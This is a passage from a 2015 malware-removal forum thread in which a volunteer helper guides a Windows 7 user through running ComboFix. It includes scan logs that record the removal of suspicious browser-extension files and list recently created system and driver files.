09:35:55.0512 0x0ff0  \Device\Harddisk1\DR1 - ok
09:35:55.0513 0x0ff0  ================ Scan VBR ==================================
09:35:55.0515 0x0ff0  [ E31F796320BFC13AF225A3096A632970 ] \Device\Harddisk0\DR0\Partition1
09:35:55.0608 0x0ff0  \Device\Harddisk0\DR0\Partition1 - ok
09:35:55.0610 0x0ff0  [ EEBC952948AFD82E1A0209C1B2F4EA58 ] \Device\Harddisk0\DR0\Partition2
09:35:55.0662 0x0ff0  \Device\Harddisk0\DR0\Partition2 - ok
09:35:55.0664 0x0ff0  [ 35D1082178515612FE8B31868D87C824 ] \Device\Harddisk2\DR2\Partition1
09:35:55.0665 0x0ff0  \Device\Harddisk2\DR2\Partition1 - ok
09:35:55.0667 0x0ff0  [ 7089FA207EC7E26D8F1F19478D7B02FD ] \Device\Harddisk1\DR1\Partition1
09:35:55.0668 0x0ff0  \Device\Harddisk1\DR1\Partition1 - ok
09:35:55.0668 0x0ff0  ================ Scan generic autorun ======================
09:35:55.0814 0x0ff0  [ A6AAD37CDCAE75CB62D039E3A4D8F5E3, 4FF763B0D129175BA1B1E794BA313E6C63F7A89D377C786BF5E730AF2A1D95D1 ] c:\Program Files\Microsoft Security Client\msseces.exe
09:35:55.0858 0x0ff0  MSC - ok
09:35:55.0860 0x0ff0  CTxfiHlp - ok
09:35:56.0534 0x0ff0  [ DFAC8E73E89EF575328D987F3425466E, 901E7F7494BDC492A85DFBD69E0F960EC786941785F250DF862B1EA1C22EFFFF ] C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe
09:35:56.0861 0x0ff0  Corsair Utility Engine - ok
09:35:57.0114 0x0ff0  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
09:35:57.0161 0x0ff0  Sidebar - ok
09:35:57.0184 0x0ff0  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
09:35:57.0212 0x0ff0  mctadmin - ok
09:35:57.0257 0x0ff0  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
09:35:57.0285 0x0ff0  Sidebar - ok
09:35:57.0289 0x0ff0  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
09:35:57.0301 0x0ff0  mctadmin - ok
09:35:57.0412 0x0ff0  [ 35B5C11A892B5C9C4CFEBA528573FDF7, 4009D85F4EA5EFCFD2818B60039021A71AC5B5DC28016A7F4B133CB45AF5D460 ] E:\Steam\steam.exe
09:35:57.0638 0x0ff0  Steam - ok
09:35:57.0664 0x0ff0  Skype - ok
09:35:57.0751 0x0ff0  [ ADA26465D52A50A34CDBC5B785035EE6, E93B8E90743EC71E74A976CFF1828EB581CFCDB1F6018AE390D6610E10DA881D ] C:\Program Files (x86)\Creative\Shared Files\CTSched.exe
09:35:57.0754 0x0ff0  CreativeTaskScheduler - detected UnsignedFile.Multi.Generic ( 1 )
09:36:00.0525 0x0ff0  Detect skipped due to KSN trusted
09:36:00.0525 0x0ff0  CreativeTaskScheduler - ok
09:36:01.0172 0x0ff0  [ F2AD1B265908797F8A5E21E0312F2F25, 2A6A612F7D52D297385C43E77AD0CD37B28F33ED2AF89098F5E66B812B838A52 ] C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
09:36:01.0247 0x0ff0  Akamai NetSession Interface - ok
09:36:01.0368 0x0ff0  [ DD7423ABBE2913E70D50E9318AD57EE4, 74BC123808F3FA60ADDC51C1383F8250608D3DBA3A8DC175B3418A1CF0BC53E9 ] C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe
09:36:01.0376 0x0ff0  Google Update - ok
09:36:01.0377 0x0ff0  Waiting for KSN requests completion. In queue: 86
09:36:02.0377 0x0ff0  Waiting for KSN requests completion. In queue: 86
09:36:03.0377 0x0ff0  Waiting for KSN requests completion. In queue: 86
09:36:03.0679 0x1a38  Object required for P2P: [ 35B5C11A892B5C9C4CFEBA528573FDF7 ] E:\Steam\steam.exe
09:36:04.0377 0x0ff0  Waiting for KSN requests completion. In queue: 2
09:36:05.0377 0x0ff0  Waiting for KSN requests completion. In queue: 1
09:36:06.0377 0x0ff0  Waiting for KSN requests completion. In queue: 1
09:36:07.0377 0x0ff0  Waiting for KSN requests completion. In queue: 1
09:36:08.0212 0x1a38  Object send P2P result: true
09:36:08.0385 0x0ff0  AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.6.305.0 ), 0x61000 ( enabled : updated )
09:36:08.0387 0x0ff0  Win FW state via NFP2: enabled ( trusted )
09:36:11.0212 0x0ff0  ============================================================
09:36:11.0212 0x0ff0  Scan finished
09:36:11.0212 0x0ff0  ============================================================
09:36:11.0217 0x18fc  Detected object count: 0
09:36:11.0217 0x18fc  Actual detected object count: 0
 



#6 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 11 October 2015 - 09:39 AM

Hello again :)

 

Step 1

Please download combofix.png Combofix (by sUBs) and save it to your Desktop.

  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.

Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)


regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#7 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 11 October 2015 - 10:03 AM

Here you are!

 

ComboFix 15-10-09.01 - Rainsford 10/11/2015   9:55.1.12 - x64
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.12279.8938 [GMT -5:00]
Running from: c:\users\Rainsford\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Disabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Preferences
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\windows\apppatch\AppLoc.exe
c:\windows\AppPatch\Custom\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb
c:\windows\msdownld.tmp
.
.
(((((((((((((((((((((((((   Files Created from 2015-09-11 to 2015-10-11  )))))))))))))))))))))))))))))))
.
.
2015-10-11 14:59 . 2015-10-11 14:59    --------    d-----w-    c:\users\Default\AppData\Local\temp
2015-10-11 14:40 . 2015-08-31 22:45    11062400    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{EDD2D79D-8030-4224-9178-6694C3EA8CC2}\mpengine.dll
2015-10-11 00:34 . 2015-10-11 00:36    --------    d-----w-    C:\FRST
2015-10-10 02:06 . 2015-08-31 22:45    11062400    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-10-07 18:29 . 2015-10-08 18:56    --------    d-----w-    c:\users\Rainsford\AppData\Roaming\PixelPiracy
2015-10-01 20:22 . 2015-10-01 20:22    --------    d-----w-    C:\Steam
2015-09-24 20:49 . 2015-09-24 20:49    --------    d-----w-    c:\program files\7-Zip
2015-09-23 18:06 . 2015-09-23 18:06    --------    d-----w-    C:\ArcheAge
2015-09-23 16:05 . 2015-07-01 01:39    1190000    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{CF0494F5-3553-492D-A7FE-ED068F101F3F}\gapaengine.dll
2015-09-23 15:41 . 2015-10-10 00:59    --------    d-----w-    c:\program files (x86)\Glyph
2015-09-18 02:32 . 2015-09-18 02:32    --------    d-----w-    c:\program files (x86)\Corsair
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-10-10 01:51 . 2015-08-26 23:51    113880    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-10-03 02:54 . 2015-06-16 04:38    780488    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2015-10-03 02:54 . 2015-06-16 04:38    142536    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-08-27 00:37 . 2015-08-26 23:34    1423120    ----a-w-    c:\windows\SysWow64\nvspcap.dll
2015-08-27 00:37 . 2015-08-26 23:34    1316000    ----a-w-    c:\windows\SysWow64\nvspbridge.dll
2015-08-27 00:36 . 2015-08-26 23:34    1756424    ----a-w-    c:\windows\system32\nvspbridge64.dll
2015-08-27 00:36 . 2015-08-26 23:34    1710568    ----a-w-    c:\windows\system32\nvspcap64.dll
2015-08-25 18:46 . 2015-09-01 21:10    112760    ----a-w-    c:\windows\system32\OpenCL.dll
2015-08-25 18:46 . 2015-09-01 21:10    105264    ----a-w-    c:\windows\SysWow64\OpenCL.dll
2015-08-25 18:46 . 2015-09-01 21:09    40280    ----a-w-    c:\windows\system32\nvhdap64.dll
2015-08-25 18:46 . 2015-09-01 21:09    204648    ----a-w-    c:\windows\system32\drivers\nvhda64v.sys
2015-08-25 18:46 . 2015-09-01 21:09    1567576    ----a-w-    c:\windows\system32\nvhdagenco6420103.dll
2015-08-25 18:46 . 2015-09-01 21:09    986232    ----a-w-    c:\windows\SysWow64\NvIFR.dll
2015-08-25 18:46 . 2015-09-01 21:09    945456    ----a-w-    c:\windows\SysWow64\NvFBC.dll
2015-08-25 18:46 . 2015-09-01 21:09    944736    ----a-w-    c:\windows\SysWow64\nvumdshim.dll
2015-08-25 18:46 . 2015-09-01 21:09    512904    ----a-w-    c:\windows\system32\nvEncodeAPI64.dll
2015-08-25 18:46 . 2015-09-01 21:09    42840368    ----a-w-    c:\windows\system32\nvcompiler.dll
2015-08-25 18:46 . 2015-09-01 21:09    421544    ----a-w-    c:\windows\SysWow64\nvEncodeAPI.dll
2015-08-25 18:46 . 2015-09-01 21:09    408184    ----a-w-    c:\windows\system32\NvIFROpenGL.dll
2015-08-25 18:46 . 2015-09-01 21:09    37819184    ----a-w-    c:\windows\SysWow64\nvcompiler.dll
2015-08-25 18:46 . 2015-09-01 21:09    364336    ----a-w-    c:\windows\SysWow64\NvIFROpenGL.dll
2015-08-25 18:46 . 2015-09-01 21:09    3527696    ----a-w-    c:\windows\system32\nvapi64.dll
2015-08-25 18:46 . 2015-09-01 21:09    3112904    ----a-w-    c:\windows\SysWow64\nvapi.dll
2015-08-25 18:46 . 2015-09-01 21:09    2940720    ----a-w-    c:\windows\system32\nvcuvid.dll
2015-08-25 18:46 . 2015-09-01 21:09    2627704    ----a-w-    c:\windows\SysWow64\nvcuvid.dll
2015-08-25 18:46 . 2015-09-01 21:09    22525560    ----a-w-    c:\windows\system32\nvoglv64.dll
2015-08-25 18:46 . 2015-09-01 21:09    1898288    ----a-w-    c:\windows\system32\nvdispco6435582.dll
2015-08-25 18:46 . 2015-09-01 21:09    18543736    ----a-w-    c:\windows\SysWow64\nvoglv32.dll
2015-08-25 18:46 . 2015-09-01 21:09    176904    ----a-w-    c:\windows\system32\nvinitx.dll
2015-08-25 18:46 . 2015-09-01 21:09    17082392    ----a-w-    c:\windows\system32\nvwgf2umx.dll
2015-08-25 18:46 . 2015-09-01 21:09    16637336    ----a-w-    c:\windows\system32\nvopencl.dll
2015-08-25 18:46 . 2015-09-01 21:09    1558648    ----a-w-    c:\windows\system32\nvdispgenco6435582.dll
2015-08-25 18:46 . 2015-09-01 21:09    155792    ----a-w-    c:\windows\SysWow64\nvinit.dll
2015-08-25 18:46 . 2015-09-01 21:09    15512888    ----a-w-    c:\windows\system32\nvd3dumx.dll
2015-08-25 18:46 . 2015-09-01 21:09    150832    ----a-w-    c:\windows\system32\nvoglshim64.dll
2015-08-25 18:46 . 2015-09-01 21:09    14936264    ----a-w-    c:\windows\system32\nvcuda.dll
2015-08-25 18:46 . 2015-09-01 21:09    14635792    ----a-w-    c:\windows\SysWow64\nvwgf2um.dll
2015-08-25 18:46 . 2015-09-01 21:09    13661160    ----a-w-    c:\windows\SysWow64\nvopencl.dll
2015-08-25 18:46 . 2015-09-01 21:09    128512    ----a-w-    c:\windows\SysWow64\nvoglshim32.dll
2015-08-25 18:46 . 2015-09-01 21:09    12515016    ----a-w-    c:\windows\SysWow64\nvd3dum.dll
2015-08-25 18:46 . 2015-09-01 21:09    12185152    ----a-w-    c:\windows\SysWow64\nvcuda.dll
2015-08-25 18:46 . 2015-09-01 21:09    11089200    ----a-w-    c:\windows\system32\drivers\nvlddmkm.sys
2015-08-25 18:46 . 2015-09-01 21:09    1106672    ----a-w-    c:\windows\system32\nvumdshimx.dll
2015-08-25 18:46 . 2015-09-01 21:09    1075320    ----a-w-    c:\windows\system32\NvFBC64.dll
2015-08-25 18:46 . 2015-09-01 21:09    1064752    ----a-w-    c:\windows\system32\NvIFR64.dll
2015-08-25 14:24 . 2015-09-01 21:11    937776    ----a-w-    c:\windows\system32\nvvsvc.exe
2015-08-25 14:24 . 2015-09-01 21:11    62584    ----a-w-    c:\windows\system32\nvshext.dll
2015-08-25 14:24 . 2015-09-01 21:11    385144    ----a-w-    c:\windows\system32\nvmctray.dll
2015-08-25 14:24 . 2015-09-01 21:11    3496752    ----a-w-    c:\windows\system32\nvsvc64.dll
2015-08-25 14:24 . 2015-09-01 21:11    2558584    ----a-w-    c:\windows\system32\nvsvcr.dll
2015-08-25 14:24 . 2015-09-01 21:11    6884984    ----a-w-    c:\windows\system32\nvcpl.dll
2015-08-25 14:08 . 2015-09-01 21:11    574072    ----a-w-    c:\windows\SysWow64\nvStreaming.exe
2015-08-25 12:35 . 2015-09-01 21:11    5165808    ----a-w-    c:\windows\system32\nvcoproc.bin
2015-08-21 16:28 . 2015-08-21 16:28    1194185    ----a-w-    c:\windows\unins000.exe
